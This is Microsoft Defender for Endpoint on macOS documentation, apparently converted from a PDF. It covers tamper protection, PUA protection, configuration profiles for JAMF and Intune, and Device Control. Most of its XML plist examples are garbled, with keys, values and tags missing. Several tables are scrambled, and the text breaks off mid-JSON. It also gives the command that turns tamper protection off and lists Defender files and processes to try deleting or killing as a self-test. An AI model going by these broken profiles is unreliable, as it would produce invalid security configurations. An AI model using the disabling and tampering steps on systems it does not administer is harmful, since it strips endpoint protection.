disabled - Tamper Protection is turned off, no prevention of attacks or reporting to
the Cloud
audit - Tamper Protection reports tampering attempts to the Cloud only, but does
not block them
block - Tamper Protection both blocks and reports attacks to the Cloud
Exclusions
Defines processes that are allowed altering Microsoft Defender's asset, without being
considering tampering. Either path, or teamId, or signingId, or their combination must
be provided. Args can be provided additionally, to specify allowed process more
precisely.
ﾉ Expand table
Section Value
Key exclusions
Path
Exact path of the process executable.
ﾉ Expand table
Section Value
Key path
Data type String
Comments In case of a shell script it will be the exact path to the interpreter binary, e.g.
/bin/zsh . No wildcards allowed.
Team Id
Apple's "Team Id" of the vendor.
ﾉ Expand table
Section Value
Key teamId
Data type String
Comments For example, UBF8T346G9 for Microsoft
Signing Id
Apple's "Signing Id" of the package.
ﾉ Expand table
Section Value
Key signingId
Data type String
Comments For example, com.apple.ruby for Ruby interpreter
Process arguments
Used in combination with other parameters to identify the process.
ﾉ Expand table
Section Value
Key signingId
Comments If specified, process argument must match those arguments exactly, case-sensitive
Section Value
Recommended configuration profile

To get started, we recommend the following configuration for your enterprise to take
advantage of all protection features that Microsoft Defender for Endpoint provides.
The following configuration profile (or, in case of JAMF, a property list that could be
uploaded into the custom settings configuration profile) will:
Enable real-time protection (RTP)

Specify how the following threat types are handled:
Potentially unwanted applications (PUA) are blocked
Archive bombs (file with a high compression rate) are audited to Microsoft
Defender for Endpoint logs
Enable automatic security intelligence updates
Enable cloud-delivered protection
Enable automatic sample submission
Property list for JAMF recommended configuration

profile
XML

<dict>
<dict>
<key>enforcementLevel</key>
<string>real_time</string>
<array>
<dict>
<key>key</key>
<key>value</key>
</dict>
<dict>
<key>key</key>
<key>value</key>
</dict>
</array>
</dict>
<dict>
<key>enabled</key>
<true/>
<true/>
<key>automaticDefinitionUpdateEnabled</key>
<true/>
</dict>
<key>tamperProtection</key>
<dict>
</dict>
</dict>
</plist>
Intune recommended profile

XML
<?xml version="1.0" encoding="utf-8"?>

<plist version="1">
<dict>
<key>PayloadUUID</key>
<string>C4E6A782-0C8D-44AB-A025-EB893987A295</string>
<key>PayloadType</key>
<string>Configuration</string>
<key>PayloadOrganization</key>
<string>Microsoft</string>
<key>PayloadIdentifier</key>
<string>com.microsoft.wdav</string>
<key>PayloadDisplayName</key>
<string>Microsoft Defender for Endpoint settings</string>
<key>PayloadDescription</key>
<string>Microsoft Defender for Endpoint configuration
settings</string>
<key>PayloadVersion</key>
<integer>1</integer>
<key>PayloadEnabled</key>
<true/>
<key>PayloadRemovalDisallowed</key>
<true/>
<key>PayloadScope</key>
<string>System</string>
<key>PayloadContent</key>
<array>
<dict>
<string>99DBC2BC-3B3A-46A2-A413-C8F9BB9A7295</string>
settings</string>
<string/>
<true/>
<dict>
<array>
<dict>
<key>key</key>
<key>value</key>
</dict>
<dict>
<key>key</key>
<key>value</key>
</dict>
</array>
</dict>
<dict>
<key>enabled</key>
<true/>
<true/>
<true/>
</dict>
<dict>
</dict>
</dict>
</array>
</dict>
</plist>
Full configuration profile example

The following templates contain entries for all settings described in this document and
can be used for more advanced scenarios where you want more control over Microsoft
Property list for JAMF full configuration profile

XML

<dict>
<dict>
<key>scanAfterDefinitionUpdate</key>
<true/>
<key>scanArchives</key>
<true/>
<key>maximumOnDemandScanThreads</key>
<array>
<dict>
<key>$type</key>
<false/>
<key>path</key>
</dict>
<dict>
<key>$type</key>
<true/>
<key>path</key>
</dict>
<dict>
<key>$type</key>
<true/>
<key>path</key>
<string>/Users/*/git</string>
</dict>
<dict>
<key>$type</key>
</dict>
<dict>
<key>$type</key>
<key>name</key>
</dict>
</array>
<array>
</array>
<array>
</array>
<array>
<dict>
<key>key</key>
<key>value</key>
</dict>
<dict>
<key>key</key>
<key>value</key>
</dict>
</array>
</dict>
<dict>
<key>enabled</key>
<true/>
<true/>
<true/>
<key>cloudBlockLevel</key>
<string>normal</string>
</dict>
<key>edr</key>
<dict>
<key>tags</key>
<array>
<dict>
<key>key</key>
<key>value</key>
</dict>
</array>
</dict>
<dict>
<array>
<dict>
<key>path</key>
<string>/bin/zsh</string>
<key>teamId</key>
<string/>
<key>signingId</key>
<string>com.apple.zsh</string>
<key>args</key>
<array>
<string>/usr/local/bin/test.sh</string>
</array>
</dict>
<dict>
<key>path</key>
<string>/usr/local/jamf/bin/jamf</string>
<key>teamId</key>
<string>483DWKW443</string>
<string>com.jamfsoftware.jamf</string>
</dict>
</array>
</dict>
<dict>
<false/>
<key>userInitiatedFeedback</key>
<string>enabled</string>
</dict>
</dict>
</plist>
Intune full profile
XML

<plist version="1">
<dict>
settings</string>
<true/>
<true/>
<array>
<dict>
settings</string>
<string/>
<true/>
<dict>
<key>scanAfterDefinitionUpdate</key>
<true/>
<key>scanArchives</key>
<true/>
<key>maximumOnDemandScanThreads</key>
<array>
<dict>
<key>$type</key>
<false/>
<key>path</key>
</dict>
<dict>
<key>$type</key>
<true/>
<key>path</key>
</dict>
<dict>
<key>$type</key>
<true/>
<key>path</key>
<string>/Users/*/git</string>
</dict>
<dict>
<key>$type</key>
</dict>
<dict>
<key>$type</key>
<key>name</key>
</dict>
</array>
<array>
</array>
<array>
</array>
<array>
<dict>
<key>key</key>
<key>value</key>
</dict>
<dict>
<key>key</key>
<key>value</key>
</dict>
</array>
</dict>
<dict>
<key>enabled</key>
<true/>
<true/>
<true/>
<key>cloudBlockLevel</key>
<string>normal</string>
</dict>
<key>edr</key>
<dict>
<key>tags</key>
<array>
<dict>
<key>key</key>
<key>value</key>
</dict>
</array>
</dict>
<dict>
<array>
<dict>
<key>path</key>
<string>/bin/zsh</string>
<key>teamId</key>
<string/>
<string>com.apple.zsh</string>
<key>args</key>
<array>
<string>/usr/local/bin/test.sh</string>
</array>
</dict>
<dict>
<key>path</key>
<string>/Library/Intune/Microsoft Intune
Agent.app/Contents/MacOS/IntuneMdmDaemon</string>
<key>teamId</key>
<string>UBF8T346G9</string>
<string>IntuneMdmDaemon</string>
</dict>
</array>
</dict>
<dict>
<false/>
<key>userInitiatedFeedback</key>
</dict>
</dict>
</array>
</dict>
</plist>
Property list validation

The property list must be a valid .plist file. This can be checked by executing:
Bash
plutil -lint com.microsoft.wdav.plist
Console
com.microsoft.wdav.plist: OK
If the file is well-formed, the above command outputs OK and returns an exit code of 0 .
Otherwise, an error that describes the issue is displayed and the command returns an
exit code of 1 .
Configuration profile deployment
Once you've built the configuration profile for your enterprise, you can deploy it
through the management console that your enterprise is using. The following sections
provide instructions on how to deploy this profile using JAMF and Intune.
JAMF deployment
From the JAMF console, open Computers > Configuration Profiles, navigate to the
configuration profile you'd like to use, then select Custom Settings. Create an entry with
com.microsoft.wdav as the preference domain and upload the .plist produced earlier.
Ｕ Caution
You must enter the correct preference domain ( com.microsoft.wdav ); otherwise, the
preferences will not be recognized by Microsoft Defender for Endpoint.
Intune deployment
1. Open Devices > Configuration Profiles. Select Create Profile.
2. Choose a name for the profile. Change Platform=macOS to Profile

type=Templates and choose Custom in the template name section. Select
Configure.
3. Save the .plist produced earlier as com.microsoft.wdav.xml .
4. Enter com.microsoft.wdav as the custom configuration profile name.
5. Open the configuration profile and upload the com.microsoft.wdav.xml file. (This
file was created in step 3.)
6. Select OK.
7. Select Manage > Assignments. In the Include tab, select Assign to All Users & All
devices.
Ｕ Caution
You must enter the correct custom configuration profile name; otherwise, these
preferences will not be recognized by Microsoft Defender for Endpoint.
Resources
Configuration Profile Reference (Apple developer documentation)
 Tip
Feedback

Detect and block potentially unwanted
applications with Microsoft Defender
Article • 11/22/2023
Applies to:

The potentially unwanted application (PUA) protection feature in Microsoft Defender for
Endpoint on macOS can detect and block PUA files on endpoints in your network.
These applications are not considered viruses, malware, or other types of threats, but
might perform actions on endpoints that adversely affect their performance or use. PUA
can also refer to applications that are considered to have poor reputation.
These applications can increase the risk of your network being infected with malware,
cause malware infections to be harder to identify, and can waste IT resources in cleaning
up the applications.
How it works
Microsoft Defender for Endpoint on macOS can detect and report PUA files. When
configured in blocking mode, PUA files are moved to the quarantine.
When a PUA is detected on an endpoint, Microsoft Defender for Endpoint on macOS

presents a notification to the user, unless notifications have been disabled. The threat
name will contain the word "Application".
Configure PUA protection

PUA protection in Microsoft Defender for Endpoint on macOS can be configured in one
of the following ways:
Off: PUA protection is disabled.
Audit: PUA files are reported in the product logs, but not in Microsoft Defender
portal. No notification is presented to the user and no action is taken by the
product.
Block: PUA files are reported in the product logs and in Microsoft Defender portal.
The user is presented with a notification and action is taken by the product.
２ Warning
By default, PUA protection is configured in Audit mode.
You can configure how PUA files are handled from the command line or from the
management console.
Use the command-line tool to configure PUA protection:

In Terminal, execute the following command to configure PUA protection:
Bash
mdatp threat policy set --type potentially_unwanted_application --action

[off|audit|block]
Use the management console to configure PUA

protection:
In your enterprise, you can configure PUA protection from a management console, such
as JAMF or Intune, similarly to how other product settings are configured. For more
information, see the Threat type settings section of the Set preferences for Microsoft
Defender for Endpoint on macOS topic.
Test PUA protection:

You are able to test PUA protection by going to Potentially unwanted applications (PUA)
demonstration.
Related topics
Set preferences for Microsoft Defender for Endpoint on macOS
 Tip
Feedback

Protect macOS security settings with
tamper protection
Article • 01/29/2024
Applies to:

Tamper protection in macOS helps prevent unwanted changes to security settings from
being made by unauthorized users. Tamper protection helps prevent unauthorized
removal of Microsoft Defender for Endpoint on macOS. This capability also helps
important security files, processes, and configuration settings from being tampered.
） Important
Starting March of 2023, Microsoft Defender for Endpoint on macOS will start
respecting the selection for tamper protection applied via the global tamper
protection switch under advanced settings in the Microsoft Defender portal
(https://security.microsoft.com ). You can choose to enforce (block/audit/disable)
your own macOS tamper protection settings by using a Mobile Device
Management (MDM) solution such as Intune or JAMF (recommended). If the
tamper protection setting was not enforced via MDM, a local administrator can
continue to manually change the setting with the following command: sudo mdatp
config tamper-protection enforcement-level --value (chosen mode) .
You can set Tamper Protection in the following modes:
ﾉ Expand table
Topic Description
Disabled Tamper protection is completely off.
Audit Tampering operations are logged, but not blocked. This mode is the default after
installation.
Block Tamper protection is on; tampering operations are blocked.

When tamper protection is set to audit or block mode, you can expect the following
outcomes:
Audit mode:
Actions to uninstall Defender for Endpoint agent is logged (audited)

Editing/modification of Defender for Endpoint files are logged (audited)
Creation of new files under Defender for Endpoint location is logged (audited)
Deletion of Defender for Endpoint files is logged (audited)
Renaming of Defender for Endpoint files is logged (audited)
Block mode:
Actions to uninstall Defender for Endpoint agent is blocked

Editing/modification of Defender for Endpoint files are blocked
Creation of new files under Defender for Endpoint location is blocked
Deletion of Defender for Endpoint files is blocked
Renaming of Defender for Endpoint files is blocked
Commands to stop the agent (wdavdaemon) fail
Here's an example of a system message in response to a blocked action:
You can configure the tamper protection mode by providing the mode name as
enforcement-level.
７ Note
The mode change will apply immediately.

If you used JAMF during the initial configuration, then you'll need to update
the configuration using JAMF as well.
Before you begin

Supported macOS versions: Big Sur (11), or later.
Minimum required version for Defender for Endpoint: 101.70.19.
Highly recommended settings:
System Integrity Protection (SIP) enabled. For more information, see Disabling and
Enabling System Integrity Protection .
Use a Mobile device management (MDM) tool to configure Microsoft Defender for
Endpoint.
Ensure that Defender for Endpoint has Full Disk Access authorization.
７ Note
Both having SIP enabled and all configuration done via MDM is not
mandatory, but required for a fully secured machine, as otherwise a local
admin still can make tampering changes that macOS manages. For example,
enabling TCC (Transparency, Consent & Control) through a Mobile Device
Management solution such as Intune, will eliminate the risk of a global admin
revoking Full Disk Access Authorization by a local admin.
Configure Tamper Protection on macOS devices

Microsoft Defender evaluates these settings in the following order. If a higher priority
setting is configured, the rest are ignored:
1. Managed configuration profile (tamperProtection/enforcementLevel setting):
JAMF
Intune
2. Manual configuration (with mdatp config tamper-protection enforcement-level --

value { disabled|audit|block } )
3. If Tamper Protection flag in Security Portal is set, the "block" mode is used (in
Preview, not available to all customers)
4. If machine is licensed, then "audit" mode is used by default
5. If machine isn't licensed, then Tamper Protection is in the "block" mode
Before you begin

Make sure that your machine is licensed and healthy (corresponding values report
true ):
Bash
mdatp health
Console
healthy : true
health_issues : []
licensed : true
...
tamper_protection : "audit"
tamper_protection reports the effective enforcement level.
Manual configuration
1. Use the following command to switch to the most restrictive mode:
Console
sudo mdatp config tamper-protection enforcement-level --value block
７ Note
You must use managed configuration profile (deployed via MDM) on production
machines. If a local admin changed tamper protection mode via a manual
configuration, they can change it to a less restrictive mode at any time as well. If
tamper protection mode was set via a managed profile, only a global admin will be
able to undo it.
2. Verify the result.
Console
healthy : true
health_issues : []
licensed : true
engine_version : "1.1.19300.3"
app_version : "101.70.19"
org_id : "..."
log_level : "info"
machine_guid : "..."
release_ring : "InsiderFast"
product_expiration : Dec 29, 2022 at 09:48:37 PM
cloud_enabled : true
cloud_automatic_sample_submission_consent : "safe"
cloud_diagnostic_enabled : false
passive_mode_enabled : false
real_time_protection_enabled : true
real_time_protection_available : true
real_time_protection_subsystem : "endpoint_security_extension"
network_events_subsystem : "network_filter_extension"
device_control_enforcement_level : "audit"
tamper_protection : "block"
automatic_definition_update_enabled : true
definitions_updated : Jul 06, 2022 at 01:57:03 PM
definitions_updated_minutes_ago : 5
definitions_version : "1.369.896.0"
definitions_status : "up_to_date"
edr_early_preview_enabled : "disabled"
edr_device_tags : []
edr_group_ids : ""
edr_configuration_version : "20.199999.main.2022.07.05.02-
ac10b0623fd381e28133debe14b39bb2dc5b61af"
edr_machine_id : "..."
conflicting_applications : []
network_protection_status : "stopped"
data_loss_prevention_status : "disabled"
full_disk_access_enabled : true
Notice that the "tamper_protection" is now set to "block".
JAMF
Configure tamper protection mode in Microsoft Defender for Endpoint configuration
profile, by adding the following settings:
XML

<dict>
<dict>
</dict>
</dict>
</plist>
７ Note
If you already have a configuration profile for Microsoft Defender for Endpoint then
you need to add settings to it. You should not create a second configuration profile.
Intune
Settings catalog
You can create a new settings catalog profile to add the Tamper protection
configuration, or you can add it to an existing one. The setting "Enforcement level" can
be found under category "Microsoft Defender" and subcategory "Tamper protection".
Afterwards, choose the desired level.
Custom profile
As an alternative, you can also configure Tamper protection via a custom profile. For
more information, see Set preferences for Microsoft Defender for Endpoint on macOS.
７ Note
For Intune configuration, you can create a new profile configuration file to add the
Tamper protection configuration, or you can add these parameters to the existing
one. Choose the desired level.
XML

<plist version="1">
<dict>
settings</string>
<true/>
<true/>
<array>
<dict>
settings</string>
<string/>
<true/>
<dict>
</dict>
</dict>
</array>
</dict>
</plist>
Check status
Check the tamper protection status by running the following command:
mdatp health --field tamper_protection
The result shows "block" if tamper protection is on:

You can also run full mdatp health and look for the "tamper_protection" in the output.
For extended information on the tamper protection status, run mdatp health --details
tamper_protection .
Verify tamper protection preventive capabilities

You can verify that tamper protection is on through various ways.
Verify block mode

Tampering alert is raised in the Microsoft Defender portal
Verify block mode and audit modes

Using Advanced hunting, you see tampering alerts appear
Tampering events can be found in the local device logs: sudo grep -F
'[{tamperProtection}]'
/Library/Logs/Microsoft/mdatp/microsoft_defender_core.log
DIY scenarios
With tamper protection set to "block", attempt different methods to uninstall
Defender for Endpoint. For example, drag the app tile into trash or uninstall
tamper protection using the command line.
Try to stop the Defender for Endpoint process (kill).
Try to delete, rename, modify, move Defender for Endpoint files (similar to what a
malicious user would do), for example:
/Applications/Microsoft Defender ATP.app/
/Library/LaunchDaemons/com.microsoft.fresno.plist
/Library/LaunchDaemons/com.microsoft.fresno.uninstall.plist
/Library/LaunchAgents/com.microsoft.wdav.tray.plist
/Library/Managed Preferences/com.microsoft.wdav.ext.plist
/Library/Managed Preferences/mdatp_managed.json
/Library/Managed Preferences/com.microsoft.wdav.atp.plist
/Library/Managed Preferences/com.microsoft.wdav.atp.offboarding.plist
/usr/local/bin/mdatp
Turning off Tamper Protection

You can turn off Tamper Protection using any of the following methods.
Manual configuration
Use the following command:
Console
sudo mdatp config tamper-protection enforcement-level --value disabled
JAMF
Change the enforcementLevel value to "disabled" in your configuration profile, and push
it to the machine:
Console

<dict>
<dict>
<string>disabled</string>
</dict>
</dict>
</plist>
Intune
Add the following configuration in your Intune profile:
XML

<plist version="1">
<dict>
settings</string>
<true/>
<true/>
<array>
<dict>
settings</string>
<string/>
<true/>
<dict>
</dict>
</dict>
</array>
</dict>
</plist>
Exclusions
７ Note
Available in version 101.98.71 or newer.
Tamper Protection prevents any macOS process from making changes to Microsoft
Defender's assets or killing Microsoft Defender's processes. Protected assets include
installation and configuration files.
Internally, Microsoft Defender makes exceptions to certain macOS processes, under

certain circumstances. As an example, macOS can upgrade Defender's package, if
Tamper Protection verifies the packages authenticity. There are other exclusions as well.
For example, macOS MDM process can replace Microsoft's Defender's managed
configuration files.
There are situations when a global administrator needs to restart Defender on all or
some managed machines. Typically it's done by creating and running a JAMF's policy
that runs a script on remote machines (or similar operations for other MDM vendors.)
In order to avoid marking those policy-initiated operations, Microsoft Defender detects

those MDM policy processes for JAMF and Intune, and permit tampering operations
from them. At the same time, Tamper Protection will block the same script from
restarting Microsoft Defender, if it is started from a Terminal locally.
However, those policy running processes are vendor specific. While Microsoft Defender
provides built-in exclusions for JAMF and Intune, it can't provide those exclusions for all
possible MDM vendors. Instead, a global administrator can add their own exclusions to
Tamper Protection. Exclusions can be done only through MDM profile, not local
configuration.
To do that, you need to first figure out the path to the MDM helper process that runs
policies. You can do it either by following the MDM vendor's documentation. You can
also initiate tampering with a test policy, get an alert in the Security Portal, inspect the
hierarchy of processes that initiated the "attack", and pick the process that looks like an
MDM helper candidate.
Once the process path is identified, you have few choices on how to configure an
exclusion:
By the path itself. It's the simplest (you already have this path) and the least secure
way to do it, in other words, not recommended.
By getting the signing ID from the executable, either TeamIdentifier or signing
Identifier, by running codesign -dv --verbose=4 path_to_helper (look for Identifier
and TeamIdentifier, the latter isn't available for Apple's own tools.)
Or by using a combination of those attributes.
Example:
Bash
codesign -dv --verbose=4 /usr/bin/ruby
Console
Executable=/usr/bin/ruby
Identifier=com.apple.ruby
Format=Mach-O universal (x86_64 arm64e)
CodeDirectory v=20400 size=583 flags=0x0(none) hashes=13+2 location=embedded
Platform identifier=14
VersionPlatform=1
VersionMin=852992
VersionSDK=852992
Hash type=sha256 size=32
CandidateCDHash sha256=335c10d40db9417d80db87f658f6565018a4c3d6
CandidateCDHashFull
sha256=335c10d40db9417d80db87f658f6565018a4c3d65ea3b850fc76c59e0e137e20
Hash choices=sha256
CMSDigest=335c10d40db9417d80db87f658f6565018a4c3d65ea3b850fc76c59e0e137e20
CMSDigestType=2
Executable Segment base=0
Executable Segment limit=16384
Executable Segment flags=0x1
Page size=4096
Launch Constraints:
None
CDHash=335c10d40db9417d80db87f658f6565018a4c3d6
Signature size=4442
Authority=Software Signing
Authority=Apple Code Signing Certification Authority
Authority=Apple Root CA
Signed Time=Apr 15, 2023 at 4:45:52 AM
Info.plist=not bound
TeamIdentifier=not set
Sealed Resources=none
Internal requirements count=1 size=64
Configure preferences, for example for JAMF:
XML

<dict>
<dict>
<array>
<dict>
<key>path</key>
<string>/usr/bin/ruby</string>
<key>teamId</key>
<string/>
<string>com.apple.ruby</string>
<key>args</key>
<array>
<string>/usr/local/bin/global_mdatp_restarted.rb</string>
</array>
</dict>
</array>
</dict>
</dict>
</plist>
Note, that excluding a scripting interpreter (like Ruby from the example above) instead
of a compiled executable isn't secure, as it can run any script, not just the one that a
global admin uses.
To minimize the risk, we recommend using extra args to allow only specific scripts to
run with scripting interpreters. In the example above, only /usr/bin/ruby
/usr/local/bin/global_mdatp_restarted.rb is permitted to restart Defender. But, for
example, /usr/bin/ruby /Library/Application Support/Global

Manager/global_mdatp_restarted.rb or even /usr/bin/ruby
/usr/local/bin/global_mdatp_restarted.rb $USER aren't allowed.
２ Warning
Always use the most restrictive criteria to prevent unexpected attacks!
Troubleshooting configuration issues
Issue: Tamper protection is reported as disabled

If running the command mdatp health reports that the tamper protection is disabled,
even if you enabled it and more than an hour has passed since the onboarding, then
you can check if you have the right configuration by running the following command:
Bash
mdatp health --details tamper_protection
Console
tamper_protection : "audit"
exclusions :
[{"path":"/usr/bin/ruby","team_id":"","signing_id":"com.apple.ruby","args":
["/usr/local/bin/global_mdatp_restarted.rb"]}] [managed]
feature_enabled_protection : true
feature_enabled_portal : true
configuration_source : "local"
configuration_local : "audit"
configuration_portal : "block"
configuration_default : "audit"
configuration_is_managed : false
tamper_protection is the effective mode. If this mode is the mode you intended to
use, then you're all set.

configuration_source indicates how Tamper Protection enforcement level is set. It
must match how you configured tamper protection. (If you set its mode through a
managed profile, and configuration_source shows something different, then you
most probably misconfigured your profile.)
mdm - it's configured through a managed profile. Only a global admin can
change it with an update to the profile!

local - it's configured with mdatp config command
portal - default enforcement level set in Security Portal

defaults - not configured, the default mode is used
If feature_enabled_protection is false, then Tamper Protection isn't enabled for

your organization (it happens if Defender doesn't report 'licensed')
If feature_enabled_portal is false, then setting default mode via Security Portal
isn't enabled for you yet.
configuration_local , configuration_portal , configuration_default tells the mode
that would be used, if the corresponding configuration channel was used. (As an
example, you can configure Tamper Protection to the "block" mode via an MDM
profile, and configuration_default tells you audit . It only means that if you
remove your profile, and the mode wasn't set with mdatp config or through
Security Portal, then it uses the default mode, which is audit .)
７ Note
You need to inspect Microsoft Defender's logs to get the same information prior to
version 101.98.71. See below for an example.
Console
$ sudo grep -F '[{tamperProtection}]: Feature state:'

/Library/Logs/Microsoft/mdatp/microsoft_defender_core.log | tail -n 1
 Tip
Feedback
Article • 10/11/2023
Applies to:

Requirements
Device Control for macOS has the following prerequisites:
＂ Microsoft Defender for Endpoint entitlement (can be trial)

＂ Minimum OS version: macOS 11 or higher
＂ Minimum product version: 101.34.20
Overview
Microsoft Defender for Endpoint Device Control feature enables you to:
Audit, allow, or prevent the read, write, or execute access to removable storage;
and
Manage iOS and Portable devices, and Apple APFS encrypted devices and
Bluetooth media, with or without exclusions.
Prepare your endpoints

Microsoft Defender for Endpoint entitlement (can be trial)
Minimum OS version: macOS 11 or higher
Deploy Full Disk Access: you may already have been previously created and
deployed this https://github.com/microsoft/mdatp-
xplat/blob/master/macos/mobileconfig/profiles/fulldisk.mobileconfig for other
MDE features. You need to grant Full Disk Access permission for a new application:
com.microsoft.dlp.daemon .
Enable Device Control on the MDE Preference setting:
Data Loss Prevention (DLP)/Features/
For Feature Name, enter "DC_in_dlp"
For State, enter "enabled"
Example 1: JAMF using schema.json
Example 2: demo.mobileconfig
XML
<key>dlp</key>
<dict>
<key>features</key>
<array>
<dict>
<key>name</key>
<string>DC_in_dlp</string>
<key>state</key>
</dict>
</array>
</dict>
Minimum product version: 101.91.92 or higher

Run mdatp version through Terminal to see the product version on your client
machine:
Device Control for macOS properties

The Device Control for macOS includes global setting, group creation and access policy
rule creation:
Global setting called 'settings' allows you to define the global environment.
Group called 'groups' allows you to create media groups. For example, authorized
USB group or encrypted USB group.
Access policy rule called 'rules' allows you to create policy to restrict each group.
For example, only allow authorized user to Write access-authorized USB group.
Here are the properties you can use when you create the group and policy.
７ Note
We recommend you use the examples on the GitHub to understand the properties:
mdatp-devicecontrol/Removable Storage Access Control Samples/macOS/policy
at main - microsoft/mdatp-devicecontrol (github.com) .
You can also use the scripts at mdatp-devicecontrol/Removable Storage Access

Control Samples/macOS/policy/scripts at main - microsoft/mdatp-devicecontrol
(github.com) to translate Windows Device Control policy to macOS Device
Control policy or translate macOS Device Control V1 policy to this V2 policy.
Settings
ﾉ Expand table
Property Description Options
name
features Feature specific You can set disable to false or true for following features:
configurations - removableMedia
- appleDevice
- portableDevice , including camera or PTP media
- bluetoothDevice
The default is true , so if you don't configure this value, it will

not apply even if you create a custom policy for
removableMedia , because it's disabled by default.
global Set default You can set defaultEnforcement to

enforcement - allow (default)
- deny
ux You can set a navigationTarget: string . Example:

hyperlink on "http://www.microsoft.com"
notification.
Group
ﾉ Expand table

name
$type The kind of group "device"
id GUID, a unique ID, You can generate the ID through New-Guid

represents the group and (Microsoft.PowerShell.Utility) - PowerShell or the
will be used in the policy. uuidgen command on macOS
name Friendly name for the string

group.
query The media coverage under See the query properties tables below for details.
this group
Query
Device Control supports two kinds of queries:
Query type 1 is as follows:

ﾉ Expand table

name
$type Identify the logical all: Any attributes under the clauses are an And relationship.
operation to For example, if the administrator puts vendorId and
perform on the serialNumber , for every connected USB, the system checks to
clauses see whether the USB meets both values.
and: is equivalent to all
any: The attributes under the clauses are Or relationship. For
example, if administrator puts vendorId and serialNumber ,
for every connected USB, system does the enforcement as
long as the USB has either an identical vendorId or
serialNumber value.
or: is equivalent to any
clauses Use media device An array of clause objects that are evaluated to determine
property to set group membership. See the Clause section below.
group condition.
Query type 2 is as follows:
ﾉ Expand table

name
$type Identify the logical operation to perform on the not: logical negation of a
subquery query
query A subquery A query which will be

negated.
Clause
Clause properties
ﾉ Expand table
Property name Description Options
$type The type of clause See the following table for supported clauses.
value $type specific value to use

Supported clauses
ﾉ Expand table
clause $type value Description
primaryId One of:

- apple_devices
-
removable_media_devices
- portable_devices
- bluetooth_devices
vendorId 4 digit hexadecimal string Matches a device's vendor ID
productId 4 digit hexadecimal string Matches a device's product ID
serialNumber string Matches a device's serial number. Doesn't match if

the device doesn't have a serial number.
encryption apfs Match if a device is apfs-encrypted.
groupId UUID string Match if a device is a member of another group. The

value represents the UUID of the group to match
against.
The group must be defined within the policy prior to
the clause.
Access policy rule
ﾉ Expand table

name
id GUID, a unique ID, represents the New-Guid (Microsoft.PowerShell.Utility) -

rule and will be used in the policy. PowerShell
uuidgen
name String, the name of the policy and

will display on the toast based on
the policy setting.
includeGroups The group(s) that the policy will be The id value inside the group must be
applied to. If multiple groups are used in this instance. If multiple groups
specified, the policy applies to any are in the includeGroups , it's AND.
media in all those groups. If not "includeGroups": ["3f082cd3-f701-4c21-
9a6a-ed115c28e217"]
name
specified, the rule applies to all

devices.
excludeGroups The group(s) that the policy doesn't The id value inside the group must be
apply to. used in this instance. If multiple groups
are in the excludeGroups, it's OR.
entries One rule can have multiple entries; See entry properties table later in this
each entry with a unique GUID tells article to get the details.
Device Control one restriction.
The following table lists the properties you can use in your entry:
ﾉ Expand table

name
$type Includes:
- removableMedia
- appleDevice
- PortableDevice
- bluetoothDevice
- generic
enforcement - $type :
- allow
- deny
- auditAllow
- auditDeny
When $type allow is selected, options value supports:

- disable_audit_allow
Even if Allow happens and the auditAllow is setting configured,
the system won't send event.
When $type deny is selected, options value supports:

disable_audit_deny
Even if Block happens and the auditDeny is setting configured, the
system won't show notification or send event.
When $type auditAllow is selected, options value supports:

send_event
When $type auditDeny is selected, options value supports:

name
send_event
show_notification
access Specify one or more access rights for this rule. These may include
either device specific granular permissions, or broader generic
permissions. See table below for more details on the valid access
types for a given entry $type.
id UUID
The following table lists the properties you can use in entry:
Enforcement
Enforcement property name
ﾉ Expand table

name
$type The type of See table below for supported enforcements

enforcement
options $type specific value An array of options for the entry. May be omitted if not
to use options are desired.
Enforcement type
ﾉ Expand table

name
Enforcement options values Description

$type [string]
allow disable_audit_allow Even if Allow happens and the auditAllow is setting

configured, the system won't send event.
deny disable_audit_deny Even if Block happens and the auditDeny is setting

configured, the system won't show notification or send
event.
name
auditAllow send_event Send telemetry
auditDeny - send_event - Send telemetry

- show_notification - Display Block UX to user
Access types
ﾉ Expand table
entry $type 'access' values [string] Generic Access Description
appleDevice backup_device generic_read
appleDevice update_device generic_write
appleDevice download_photos_from_device generic_read download photo(s) from

the specific iOS device to
local machine
appleDevice download_files_from_device generic_read download file(s) from the

specific iOS device to
local machine
appleDevice sync_content_to_device generic_write sync content from local

machine to specific iOS
device
portableDevice download_files_from_device generic_read
portableDevice send_files_to_device generic_write
portableDevice download_photos_from_device generic_read
portableDevice debug generic_execute ADB tool control
*removableMedia read generic_read
removableMedia write generic_write
removableMedia execute generic_execute generic_read
bluetoothDevice download_files_from_device
bluetoothDevice send_files_to_device generic_write
generic generic_read Equivalent to setting all

access values denoted in
entry $type 'access' values [string] Generic Access Description
this table that map to

generic_read.
generic generic_write Equivalent to setting all

generic_write.
generic generic_execute Equivalent to setting all

generic_execute.
End-user experience
Once Deny happens and the notification is enabled in the policy, the end user sees a
dialog:
Status
Use mdatp health --details device_control to inspect the Device Control status:
Console
active : ["v2"]
v1_configured : false
v1_enforcement_level : unavailable
v2_configured : true
v2_state : "enabled"
v2_sensor_connection : "created_ok"
v2_full_disk_access : "approved"
active - feature version, you should see ["v2"]. (Device Control is enabled, but not
configured.)
[] - Device Control is not configured on this machine
["v1"] - You are on a preview version of Device Control. Please migrate to
version 2 using this guide. v1 is considered obsolete and not described in this
documentation.
["v1","v2"] - You have both v1 and v2 enabled. Please offboard from v1.
v1_configured - v1 configuration is applied
v1_enforcement_level - when v1 is enabled
v2_configured - v2 configuration is applied
v2_state - v2 status, enabled if fully working

v2_sensor_connection - if created_ok , then Device Control established connection
to the system extension

v2_full_disk_access - if not approved , then Device Control cannot prevent some
or all operations
Reporting
You'll be able to see the policy event on Advanced hunting and Device Control report.
For more information, see Protect your organization's data with Device Control.
Scenarios
Here are some common scenarios to help you familiarize with Microsoft Defender for
Endpoint and Microsoft Defender for Endpoint Device Control.
Scenario 1: Deny any removable media but allow specific

USBs
In this scenario, you need to create two groups: one group for any removable media,
and another group for approved USBs group. You also need to create an access policy
rule.
Step 1: Settings: enable Device Control and set Default Enforcement
JSON
"settings": {
"features": {
"removableMedia": {
"disable": false
},
"global": {
"defaultEnforcement": "allow"
},
"ux": {
"navigationTarget": "http://www.deskhelp.com"
Step 2: Groups: Create any removable media group and approved-

USBs group
-1. Create a group to cover any removable media devices -1. Create a group for
approved USBs -1. Combine those groups into one 'groups'
JSON
"groups": [
"type": "device",
"id": "3f082cd3-f701-4c21-9a6a-ed115c28e211",
"name": "All Removable Media Devices",
"query": {
"$type": "all",
"clauses": [
{
"$type": "primaryId",
"value": "removable_media_devices"
},
"type": "device",
"id": "3f082cd3-f701-4c21-9a6a-ed115c28e212",
